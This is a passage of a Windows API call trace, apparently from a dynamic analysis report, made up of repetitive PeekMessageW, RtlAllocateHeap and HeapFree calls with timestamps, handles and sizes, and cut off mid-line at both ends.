wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.255] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.261] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.261] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.263] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 